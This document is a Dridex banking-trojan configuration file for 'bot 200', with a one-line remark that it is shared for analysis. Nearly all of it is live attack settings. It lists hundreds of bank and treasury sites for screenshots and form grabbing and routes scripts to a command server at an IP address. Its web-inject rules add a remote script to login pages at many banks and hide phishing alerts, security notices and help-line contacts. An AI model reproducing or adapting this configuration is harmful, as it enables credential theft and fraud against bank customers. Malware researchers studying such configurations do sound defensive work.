Dridex bot 200 settings

1. Dridex settings for bot 200. For analysis purposes.
2. <settings hash="2fe62d67231906f960de4ec341ed2bde0819389a">
3. <httpblock>
4. <url type="allow">wex8\.suntrust\.com</url>
5. <url type="allow">www7\.suntrust\.com</url>
6. <url type="allow">pane\.bankofamerica\.com</url>
7. <url type="allow">www\.amegybank\.com/metrics</url>
8. <url type="allow">www2\.citibank\.citigroup\.com</url>
9. <url type="allow">images\.citibank\.citigroup\.com</url>
10. <url type="allow">www7\.compassbank\.com</url>
11. <url type="allow">www\.u43\.pnc\.com</url>
12. <url type="allow">cdn2\.svbconnect\.com</url>
13. <url type="allow">portal\.accountonline\.com</url>
14. <url type="allow">ww7\.whitneybank\.com</url>
15. <url type="allow">www8\.firstcitizensonline\.com</url>
16. <url type="allow">olbb2pp\.bmo\.com</url>
17. <url type="allow">www2\.americafirst\.com</url>
18. <url type="allow">cdn\.first\-online\.com</url>
19. <url type="allow">img3\.moneygram\.com</url>
20. <url type="allow">securentrycorp\.zionsbank\.com/metrics</url>
21. <url type="allow">ground\.citi\.com</url>
22. <url type="allow">www9\.firstcitizens\.com</url>
23. <url type="allow">www7\.hwtreasurysolution\.com</url>
24. <url type="allow">.*\.sessioncam\.com</url>
25. <url type="allow">www\.treasury\.pncbank\.com/tmmps</url>
26. <url type="allow">assets\.adobedtm\.com</url>
27. <url type="allow">analytics\.pnc\.com</url>
28. <url type="allow">.*\.doubleclick\.net</url>
29. <url type="allow">.*\.atdmt\.com</url>
30. <url type="allow">.*\.mathtag\.com</url>
31. <url type="allow">.*\.rubiconproject\.com</url>
32. <url type="allow">.*\.pubmatic\.com</url>
33. <url type="allow">.*\.bluekai\.com</url>
34. </httpblock>
35. <httpshots>
36. <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
37. <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
38. <url type="allow" onpost="1" onget="1">\.com/k1/</url>
39. <url type="allow" onpost="1" onget="1">/authentication/zbf/k/</url>
40. <url type="allow" onpost="1" onget="1">/bb/logon/</url>
41. <url type="allow" onpost="1" onget="1">/cashman/</url>
42. <url type="allow" onpost="1" onget="1">/cashplus/</url>
43. <url type="allow" onpost="1" onget="1">/clkccm/</url>
44. <url type="allow" onpost="1" onget="1">/cmmain\.cfm</url>
45. <url type="allow" onpost="1" onget="1">/cmserver/</url>
46. <url type="allow" onpost="1" onget="1">/cmwire</url>
47. <url type="allow" onpost="1" onget="1">achredirect\.aspx</url>
48. <url type="allow" onpost="1" onget="1">cbonline</url>
49. <url type="allow" onpost="1" onget="1">/ebc_ebc1961/</url>
50. <url type="allow" onpost="1" onget="1">/ibs\.</url>
51. <url type="allow" onpost="1" onget="1">/loginolb/loginolb</url>
52. <url type="allow" onpost="1" onget="1">/olbb/</url>
53. <url type="allow" onpost="1" onget="1">/sbuser/</url>
54. <url type="allow" onpost="1" onget="1">/smallbiz/</url>
55. <url type="allow" onpost="1" onget="1">/wcmpw/</url>
56. <url type="allow" onpost="1" onget="1">/webcm/</url>
57. <url type="allow" onpost="1" onget="1">/wire/</url>
58. <url type="allow" onpost="1" onget="1">/wires/</url>
59. <url type="allow" onpost="1" onget="1">access\.jpmorgan\.com</url>
60. <url type="allow" onpost="1" onget="1">access\.usbank\.com</url>
61. <url type="allow" onpost="1" onget="1">accessbankplc\.com</url>
62. <url type="allow" onpost="1" onget="1">accountoverview\.aspx</url>
63. <url type="allow" onpost="1" onget="1">accurint\.com</url>
64. <url type="allow" onpost="1" onget="1">achieveaccess\.citizensbank\.com</url>
65. <url type="allow" onpost="1" onget="1">achpayment</url>
66. <url type="allow" onpost="1" onget="1">achweb\.unionbank\.com</url>
67. <url type="allow" onpost="1" onget="1">achworks\.com</url>
68. <url type="allow" onpost="1" onget="1">alltimetreasury\.pacificcapitalbank\.com</url>
69. <url type="allow" onpost="1" onget="1">amegybank\.com/</url>
70. <url type="allow" onpost="1" onget="1">atbonlinebusiness\.com</url>
71. <url type="allow" onpost="1" onget="1">auth\.umb\.com</url>
72. <url type="allow" onpost="1" onget="1">authmaster\.nationalcity\.com</url>
73. <url type="allow" onpost="1" onget="1">bankofbermuda\.com</url>
74. <url type="allow" onpost="1" onget="1">billauth</url>
75. <url type="allow" onpost="1" onget="1">billmenu</url>
76. <url type="allow" onpost="1" onget="1">blilk</url>
77. <url type="allow" onpost="1" onget="1">bmo\.com/</url>
78. <url type="allow" onpost="1" onget="1">bmoharrisprivatebankingonline\.com</url>
79. <url type="allow" onpost="1" onget="1">bmomutualfunds\.com</url>
80. <url type="allow" onpost="1" onget="1">bnycash\.bankofny\.com</url>
81. <url type="allow" onpost="1" onget="1">business\.macu\.com</url>
82. <url type="allow" onpost="1" onget="1">business\.netbankerplus\.com</url>
83. <url type="allow" onpost="1" onget="1">businessaccess\.citibank\.citigroup\.com</url>
84. <url type="allow" onpost="1" onget="1">businessappshome</url>
85. <url type="allow" onpost="1" onget="1">businessclassonline\.compassbank\.com</url>
86. <url type="allow" onpost="1" onget="1">businesslogin</url>
87. <url type="allow" onpost="1" onget="1">businessportal\.mibank\.com</url>
88. <url type="allow" onpost="1" onget="1">bxs\.com</url>
89. <url type="allow" onpost="1" onget="1">cashanalyzer\.com</url>
90. <url type="allow" onpost="1" onget="1">cashmanager\.mizuhoe\-treasurer\.com</url>
91. <url type="allow" onpost="1" onget="1">cashmgmt</url>
92. <url type="allow" onpost="1" onget="1">cashmgt</url>
93. <url type="allow" onpost="1" onget="1">bankofamerica\.com</url>
94. <url type="allow" onpost="1" onget="1">cashproweb\.com/cpwportal</url>
95. <url type="allow" onpost="1" onget="1">cbbusinessonline\.com</url>
96. <url type="allow" onpost="1" onget="1">cfgbusinessaccess\.com</url>
97. <url type="allow" onpost="1" onget="1">checkgateway</url>
98. <url type="allow" onpost="1" onget="1">chaseonline\.chase\.com/MyAccounts\.aspx</url>
99. <url type="allow" onpost="1" onget="1">cib\.bankofthewest</url>
100. <url type="allow" onpost="1" onget="1">citizensbankmoneymanagergps\.com</url>
101. <url type="allow" onpost="1" onget="1">cmachm\.w</url>
102. <url type="allow" onpost="1" onget="1">cmbmnt\.w</url>
103. <url type="allow" onpost="1" onget="1">cmol\.bbt\.com/auth</url>
104. <url type="allow" onpost="1" onget="1">cmwirp\.w</url>
105. <url type="allow" onpost="1" onget="1">cnbsec1\.</url>
106. <url type="allow" onpost="1" onget="1">colb\.</url>
107. <url type="allow" onpost="1" onget="1">commercebusinessdirect\.com</url>
108. <url type="allow" onpost="1" onget="1">commercial\.wachovia\.com</url>
109. <url type="allow" onpost="1" onget="1">commercialservices</url>
110. <url type="allow" onpost="1" onget="1">connect\.bankcolonial\.com</url>
111. <url type="allow" onpost="1" onget="1">connect\.colonialbank\.com</url>
112. <url type="allow" onpost="1" onget="1">constitutioncorp\.org</url>
113. <url type="allow" onpost="1" onget="1">corpach</url>
114. <url type="allow" onpost="1" onget="1">corporate\.epfc\.com</url>
115. <url type="allow" onpost="1" onget="1">corporateaccounts</url>
116. <url type="allow" onpost="1" onget="1">corporatebankingweb</url>
117. <url type="allow" onpost="1" onget="1">corporateconnect\.net</url>
118. <url type="allow" onpost="1" onget="1">corpower\.coop</url>
119. <url type="allow" onpost="1" onget="1">createcorpwire</url>
120. <url type="allow" onpost="1" onget="1">createwire</url>
121. <url type="allow" onpost="1" onget="1">ebanking\-services</url>
122. <url type="allow" onpost="1" onget="1">ecash\.</url>
123. <url type="allow" onpost="1" onget="1">ecm\-transfers\.unionbank\.com</url>
124. <url type="allow" onpost="1" onget="1">ecms\.unionbank\.com</url>
125. <url type="allow" onpost="1" onget="1">efirstbank\.com</url>
126. <url type="allow" onpost="1" onget="1">enternetbank\.com</url>
127. <url type="allow" onpost="1" onget="1">express\.53\.com</url>
128. <url type="allow" onpost="1" onget="1">expressdeposit\.colonialbank\.com</url>
129. <url type="allow" onpost="1" onget="1">fbmedirect\.com</url>
130. <url type="allow" onpost="1" onget="1">ffinonline\.com</url>
131. <url type="allow" onpost="1" onget="1">firstbancorp\.com</url>
132. <url type="allow" onpost="1" onget="1">firstbanks\.com</url>
133. <url type="allow" onpost="1" onget="1">fnfgbusinessonline\.enterprisebanker\.com</url>
134. <url type="allow" onpost="1" onget="1">fxpayments\.americanexpress\.com</url>
135. <url type="allow" onpost="1" onget="1">goldleaf</url>
136. <url type="allow" onpost="1" onget="1">hbcash\.exe</url>
137. <url type="allow" onpost="1" onget="1">hblibank\.com</url>
138. <url type="allow" onpost="1" onget="1">hbproxy\.exe</url>
139. <url type="allow" onpost="1" onget="1">ibbpl2\.com</url>
140. <url type="allow" onpost="1" onget="1">ibbpowerlink\.com</url>
141. <url type="allow" onpost="1" onget="1">ibbusinessnet\.com</url>
142. <url type="allow" onpost="1" onget="1">inetbanker</url>
143. <url type="allow" onpost="1" onget="1">internationalbanking\.</url>
144. <url type="allow" onpost="1" onget="1">internationalpayments\.</url>
145. <url type="allow" onpost="1" onget="1">internet\-ebanking\.com</url>
146. <url type="allow" onpost="1" onget="1">itreasury\.amsouth\.com</url>
147. <url type="allow" onpost="1" onget="1">ktt\.key\.com</url>
148. <url type="allow" onpost="1" onget="1">lakelandbank\.com</url>
149. <url type="allow" onpost="1" onget="1">libertymutualbusinessdirect\.com</url>
150. <url type="allow" onpost="1" onget="1">lionbank\.com</url>
151. <url type="allow" onpost="1" onget="1">login_business\.asp</url>
152. <url type="allow" onpost="1" onget="1">logincm</url>
153. <url type="allow" onpost="1" onget="1">mcb\-home\.com/online</url>
154. <url type="allow" onpost="1" onget="1">memberach</url>
155. <url type="allow" onpost="1" onget="1">metrobankdirect\.com</url>
156. <url type="allow" onpost="1" onget="1">midatlanticcorp\.org</url>
157. <url type="allow" onpost="1" onget="1">moneymanagergps\.com</url>
158. <url type="allow" onpost="1" onget="1">olb\.ent\.com/business/</url>
159. <url type="allow" onpost="1" onget="1">online\.1stnb\.com</url>
160. <url type="allow" onpost="1" onget="1">onlineaccess1\.com</url>
161. <url type="allow" onpost="1" onget="1">onlinebanking\.1stunitedbankfl\.com</url>
162. <url type="allow" onpost="1" onget="1">onlinebanking\.banksterling\.com</url>
163. <url type="allow" onpost="1" onget="1">onlinencr\.com</url>
164. <url type="allow" onpost="1" onget="1">onlineserv/cm/</url>
165. <url type="allow" onpost="1" onget="1">otm\.suntrust\.com</url>
166. <url type="allow" onpost="1" onget="1">pacificenterprisebank\.com</url>
167. <url type="allow" onpost="1" onget="1">passport\.texascapitalbank\.com</url>
168. <url type="allow" onpost="1" onget="1">pastabanka\.lv</url>
169. <url type="allow" onpost="1" onget="1">paylinks\.cunet\.org</url>
170. <url type="allow" onpost="1" onget="1">payroll\.faces</url>
171. <url type="allow" onpost="1" onget="1">pres_wa_wires</url>
172. <url type="allow" onpost="1" onget="1">rbs_commercial</url>
173. <url type="allow" onpost="1" onget="1">royalbank\.com/cgi\-bin/rbaccess</url>
174. <url type="allow" onpost="1" onget="1">rsagoidauthentication</url>
175. <url type="allow" onpost="1" onget="1">secure\-banking</url>
176. <url type="allow" onpost="1" onget="1">secure\-eccu\.org</url>
177. <url type="allow" onpost="1" onget="1">secure\-nvboh\.com/</url>
178. <url type="allow" onpost="1" onget="1">secure\.1stfedbank\.com</url>
179. <url type="allow" onpost="1" onget="1">secure\.ally\.com</url>
180. <url type="allow" onpost="1" onget="1">secure\.bancinternetgroup\.com</url>
181. <url type="allow" onpost="1" onget="1">secure\.fundsxpress\.com</url>
182. <url type="allow" onpost="1" onget="1">secureport\.texascapitalbank\.com</url>
183. <url type="allow" onpost="1" onget="1">server14\.cey\-ebanking\.com</url>
184. <url type="allow" onpost="1" onget="1">singlepoint\.usbank\.com</url>
185. <url type="allow" onpost="1" onget="1">suntrust\.omniasp\.com</url>
186. <url type="allow" onpost="1" onget="1">svbconnect</url>
187. <url type="allow" onpost="1" onget="1">swifttransfer</url>
188. <url type="allow" onpost="1" onget="1">tabbank\.com</url>
189. <url type="allow" onpost="1" onget="1">tdcommercialbanking</url>
190. <url type="allow" onpost="1" onget="1">treas\-mgt\.frostbank\.com</url>
191. <url type="allow" onpost="1" onget="1">treasury\.pncbank\.com</url>
192. <url type="allow" onpost="1" onget="1">treasury\.wamu\.com</url>
193. <url type="allow" onpost="1" onget="1">treasurydirect\.tdbank\.com</url>
194. <url type="allow" onpost="1" onget="1">treasurylinkweb\.com</url>
195. <url type="allow" onpost="1" onget="1">treasurypathways\.com</url>
196. <url type="allow" onpost="1" onget="1">treasuryservices\.banknow\.texascapitalbank\.com</url>
197. <url type="allow" onpost="1" onget="1">trz\.tranzact\.org</url>
198. <url type="allow" onpost="1" onget="1">usgateway2\.rbs\.com</url>
199. <url type="allow" onpost="1" onget="1">^https.+usaa\.com</url>
200. <url type="allow" onpost="1" onget="1">wblnk\.</url>
201. <url type="allow" onpost="1" onget="1">wcma\.businesscenter\.ml\.com/bcprivate/asp/wcmaloginea\.aspx</url>
202. <url type="allow" onpost="1" onget="1">wcmfd/wcmpw</url>
203. <url type="allow" onpost="1" onget="1">web\-access</url>
204. <url type="allow" onpost="1" onget="1">web\.accessor\.com</url>
205. <url type="allow" onpost="1" onget="1">webbankingforbusiness\.mandtbank\.com</url>
206. <url type="allow" onpost="1" onget="1">webcash</url>
207. <url type="allow" onpost="1" onget="1">webcashmgmt\.com</url>
208. <url type="allow" onpost="1" onget="1">webexpress</url>
209. <url type="allow" onpost="1" onget="1">weblink\.websterbank\.com</url>
210. <url type="allow" onpost="1" onget="1">wiretransfer</url>
211. <url type="allow" onpost="1" onget="1">^https.+schwab\.com</url>
212. <url type="allow" onpost="1" onget="1">^https.+key\.com</url>
213. <url type="allow" onpost="1" onget="1">^https.+vanguard\.com</url>
214. <url type="allow" onpost="1" onget="1">^https.+etrade\.com</url>
215. <url type="allow" onpost="1" onget="1">^https.+pnc\.com</url>
216. </httpshots>
217. <formgrabber>
218. <url type="deny">\.(swf)($|\?)</url>
219. <url type="deny">/isapi/ocget.dll</url>
220. <url type="allow">^https?://aol.com/.*/login/</url>
221. <url type="allow">^https?://accounts.google.com/ServiceLogin</url>
222. <url type="allow">^https?://login.yahoo.com/</url>
223. <url type="allow">^https?://login.live.com/</url>
224. <url type="deny">^https?://(\w+\.)?aol.com</url>
225. <url type="deny">^https?://(\w+\.)?facebook.com/</url>
226. <url type="deny">^https?://(\w+\.)?google</url>
227. <url type="deny">^https?://(\w+\.)?yahoo</url>
228. <url type="deny">^https?://(\w+\.)?youtube.com</url>
229. <url type="deny">^https?://(\w+\.)?live.com</url>
230. <url type="deny">^https?://(\w+\.)?twitter.com</url>
231. <url type="deny">^https?://(\w+\.)?vk.com</url>
232. <url type="deny">^https.*ocsp\..+$</url>
233. <url type="deny">^https.*safebrowsing\..+$</url>
234. <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
235. <url type="deny">^https://s.*\.symcd\.com</url>
236. <url type="deny">^https://s.*\.symcb\.com</url>
237. <url type="deny">^https.*ocsp2\..+$</url>
238. <url type="deny">^https://localhost.+skypectoc/.+$</url>
239. <url type="deny">\.messenger\.live\.com</url>
240. <url type="deny">pipe\.skype\.com</url>
241. <url type="deny">\.lphbs\.com</url>
242. <url type="deny">ocsp\.digicert\.com</url>
243. <url type="deny">txtsrving\.info</url>
244. <url type="deny">zynga\.com</url>
245. <url type="deny">yahoo\.com</url>
246. <url type="deny">pnrws\.skype\.com</url>
247. <url type="deny">netflix\.com</url>
248. <url type="deny">bluecava\.com</url>
249. <url type="deny">liverail\.com </url>
250. <url type="deny">bing\.com</url>
251. <url type="deny">\.optimatic\.com</url>
252. <url type="deny">hiro\.tv</url>
253. <url type="deny">spotxchange\.com</url>
254. <url type="deny">nielsen\.com</url>
255. <url type="deny">mapquest\.com </url>
256. <url type="deny">^https://.+\.skype\.com/api/</url>
257. <url type="deny">(//|\.)lphbs.com</url>
258. <url type="deny">(//|\.)zynga.com</url>
259. </formgrabber>
260. <clickshots />
261. <redirects>
262. <redirect name="1st" vnc="0" socks="0" uri="http://87.106.25.167:8080/staticstat" timeout="20">personalomnistat.js</redirect>
263. <redirect name="2nd" vnc="1" socks="1" uri="http://87.106.25.167:8080/tickerlive" timeout="20">statticker2.js</redirect>
264. </redirects>
265. <httpinjects>
266. <httpinject>
267. <conditions>
268. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login\.jsp</url>
269. </conditions>
270. <actions>
271. <modify>
272. <pattern modifiers="i"><![CDATA["><p align="justify"]]></pattern>
273. <replacement><![CDATA[display:none;"><p align="justify"]]></replacement>
274. </modify>
275. <modify>
276. <pattern modifiers="i"><![CDATA[Customer Service: <span dir="ltr">.*</span>]]></pattern>
277. <replacement><![CDATA[]]></replacement>
278. </modify>
279. <modify>
280. <pattern modifiers="i"><![CDATA[(td valign="middle" class="columndata" style="padding-left:30px;)]]></pattern>
281. <replacement><![CDATA[\1display:none;]]></replacement>
282. </modify>
283. </actions>
284. </httpinject>
285. <httpinject>
286. <conditions>
287. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login2\.jsp</url>
288. </conditions>
289. <actions>
290. <modify>
291. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
292. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
293. </modify>
294. </actions>
295. </httpinject>
296. <httpinject>
297. <conditions>
298. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://fiepay\.mashreqbank\.com/Login\.asp</url>
299. </conditions>
300. <actions>
301. <modify>
302. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
303. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
304. </modify>
305. <modify>
306. <pattern modifiers="i"><![CDATA[(href="SecurityAlert\.htm")]]></pattern>
307. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
308. </modify>
309. </actions>
310. </httpinject>
311. <httpinject>
312. <conditions>
313. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://banking\.mashreqbank\.com/FID/login\.aspx</url>
314. </conditions>
315. <actions>
316. <modify>
317. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
318. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
319. </modify>
320. <modify>
321. <pattern modifiers="i"><![CDATA[(id="ContactTable")]]></pattern>
322. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
323. </modify>
324. </actions>
325. </httpinject>
326. <httpinject>
327. <conditions>
328. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/EntlWeb/IbsJsps/orbilogin\.jsp</url>
329. </conditions>
330. <actions>
331. <modify>
332. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
333. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
334. </modify>
335. </actions>
336. </httpinject>
337. <httpinject>
338. <conditions>
339. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/B001/SMELogin\.jsp</url>
340. </conditions>
341. <actions>
342. <modify>
343. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
344. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
345. </modify>
346. <modify>
347. <pattern modifiers="i"><![CDATA[<span class="text-1"><i class="icon-ok"></i> Need assistance call <span>.*</span></span>]]></pattern>
348. <replacement><![CDATA[]]></replacement>
349. </modify>
350. </actions>
351. </httpinject>
352. <httpinject>
353. <conditions>
354. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://rakbankonline\.ae/corp/BANKAWAY(;|\?|$)</url>
355. </conditions>
356. <actions>
357. <modify>
358. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
359. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
360. </modify>
361. <modify>
362. <pattern modifiers="i"><![CDATA[( class="trouble")]]></pattern>
363. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
364. </modify>
365. <modify>
366. <pattern modifiers="i"><![CDATA[( class="disclaimer")]]></pattern>
367. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
368. </modify>
369. </actions>
370. </httpinject>
371. <httpinject>
372. <conditions>
373. <url type="allow" onpost="1" onget="1" modifiers="">^https://bnycash\.bankofny\.com/$</url>
374. </conditions>
375. <actions>
376. <modify>
377. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
378. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
379. </modify>
380. </actions>
381. </httpinject>
382. <httpinject>
383. <conditions>
384. <url type="allow" onpost="1" onget="1" modifiers="U">^https://cmol\.bbt\.com/auth/prompt\.tb</url>
385. </conditions>
386. <actions>
387. <modify>
388. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
389. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
390. </modify>
391. <modify>
392. <pattern modifiers="Ums"><![CDATA[<strong>Security</strong>.*<p class="errortext">(?<inject>.*)</p>]]></pattern>
393. <replacement />
394. </modify>
395. </actions>
396. </httpinject>
397. <httpinject>
398. <conditions>
399. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.bmo\.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet($|\?)</url>
400. </conditions>
401. <actions>
402. <modify>
403. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
404. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
405. </modify>
406. </actions>
407. </httpinject>
408. <httpinject>
409. <conditions>
410. <url type="allow" onpost="1" onget="1" modifiers="U">^https://w\d+\.businessbanking\.cibc\.com/logon\.jsp($|\?|\;)</url>
411. </conditions>
412. <actions>
413. <modify>
414. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
415. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
416. </modify>
417. </actions>
418. </httpinject>
419. <httpinject>
420. <conditions>
421. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*.royalbank.com/cgi-bin/rbaccess/(rbcgi|rbunxcgi\?.+=ClientSignin)</url>
422. <url type="allow" onpost="1" onget="1" modifiers="U">^https://easywebcpo\.td\.com/waw/idp/login\.htm</url>
423. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.cibconline\.cibc\.com/olbtxn/authentication/.+\.cibc($|\?.*)</url>
424. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*\.bmo\.com/cgi\-bin/netbnx/NBmain($|\?)</url>
425. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.bmomutualfunds\.com/(|cfm/Holdings)$</url>
426. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\d*\.bmoharrisprivatebankingonline\.com/Client/DFSignIn/DFLogin\.aspx($|\?)</url>
427. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[1-9a-z\.\-]+\.web\-access\.com/.*(login|welcome|auth).*\.cgi</url>
428. <url type="allow" onpost="1" onget="1" modifiers="U">^https://webinfocus\.mandtbank\.com/mandt/cgi\-bin/.*(login|welcome|auth).*\.cgi</url>
429. <url type="allow" onpost="1" onget="1" modifiers="">^https://towernet\.capitalonebank\.com/.*login.*\.(cgi|html)</url>
430. <url type="allow" onpost="1" onget="1" modifiers="i">^https://webbankingforbusiness\.mandtbank\.com/(|SBBSignOn\.aspx)(\?|$)</url>
431. <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.calbanktrust\.com/iLogin\.jsp(\?|$)</url>
432. <url type="allow" onpost="1" onget="1" modifiers="i">^https://onlinebanking\.banksterling\.com/login2.asp(\?|$)</url>
433. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.enternetbank\.com/TESrvAuth\?.*laf=exact4web</url>
434. <url type="allow" onpost="1" onget="1" modifiers="">^https://(www\.|)ibbpowerlink\.com/fotrd/login\.jsp(\?|$)</url>
435. <url type="allow" onpost="1" onget="1" modifiers="i">^https://bolb\-(west|east)\.associatedbank\.com/(|Security/Password\.aspx)(\?|$)</url>
436. <url type="allow" onpost="1" onget="1" modifiers="">^https://vpn\d*\.sandyspringbank\.com/\+CSCOE\+/logon\.html(\?|$)</url>
437. <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)mbachexpress\.com/Inductor/Login\.aspx(\?|$)</url>
438. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ifxmanager\.bnymellon\.com/pw/pwserv/smpwservicescgi\.exe\?</url>
439. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.nashvillecitizensbank\.com/olbb/(|login\.asp)(\?|$)</url>
440. <url type="allow" onpost="1" onget="1" modifiers="i">^https://cbs\.firstcitizens\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
441. <url type="allow" onpost="1" onget="1" modifiers="">^https://achieveaccess\.citizensbank\.com/exchange/(\?|$)</url>
442. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/Common/SignOn/Start\.asp$</url>
443. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaonline\.scotiabank\.com/online/start\.jsp(\?|$)</url>
444. <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.firsttennessee\.biz/servlet/ftb/index.html(\?|$)</url>
445. <url type="allow" onpost="1" onget="1" modifiers="">^https://businessclassonline\.compassbank\.com/fi\d+\_Banking/bb/logon(\?|$)</url>
446. </conditions>
447. <actions>
448. <modify>
449. <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
450. <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
451. </modify>
452. <modify>
453. <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
454. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\2]]></replacement>
455. </modify>
456. </actions>
457. </httpinject>
458. <httpinject>
459. <conditions>
460. <url type="allow" onpost="1" onget="1" modifiers="">^https://cbs\.fidelitybanknc\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
461. </conditions>
462. <actions>
463. <modify>
464. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
465. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
466. </modify>
467. </actions>
468. </httpinject>
469. <httpinject>
470. <conditions>
471. <url type="allow" onpost="1" onget="1" modifiers="U">^https://treas\-mgt\.frostbank\.com/rdp/cgi\-bin/[a-zA-z]+\.cgi</url>
472. </conditions>
473. <actions>
474. <modify>
475. <pattern modifiers="imsU"><![CDATA[(name="login\_form".+</form>)]]></pattern>
476. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
477. </modify>
478. </actions>
479. </httpinject>
480. <httpinject>
481. <conditions>
482. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.hsbc\.ca/1/2/</url>
483. </conditions>
484. <actions>
485. <modify>
486. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
487. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
488. </modify>
489. </actions>
490. </httpinject>
491. <httpinject>
492. <conditions>
493. <url type="allow" onpost="1" onget="1" modifiers="">^https://secure\.rabobank\.com/Gateway/offlineloginpage\.html(\?|$)</url>
494. </conditions>
495. <actions>
496. <modify>
497. <pattern modifiers=""><![CDATA[(</FORM>)]]></pattern>
498. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
499. </modify>
500. </actions>
501. </httpinject>
502. <httpinject>
503. <conditions>
504. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)</url>
505. </conditions>
506. <actions>
507. <modify>
508. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
509. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
510. </modify>
511. <modify>
512. <pattern modifiers="sA"><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>]]></pattern>
513. <replacement />
514. </modify>
515. </actions>
516. </httpinject>
517. <httpinject>
518. <conditions>
519. <url type="allow" onpost="1" onget="1" modifiers="">^https://usgateway\d*\.rbs\.com/wps/portal/cb/applications.*MoneyManagerGps</url>
520. </conditions>
521. <actions>
522. <modify>
523. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
524. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
525. </modify>
526. </actions>
527. </httpinject>
528. <httpinject>
529. <conditions>
530. <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)securenetbanking\.ca/(IBClient/loginCorp|IBRetail/loginbusiness)\.aspx(\?|$)</url>
531. </conditions>
532. <actions>
533. <modify>
534. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
535. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
536. </modify>
537. </actions>
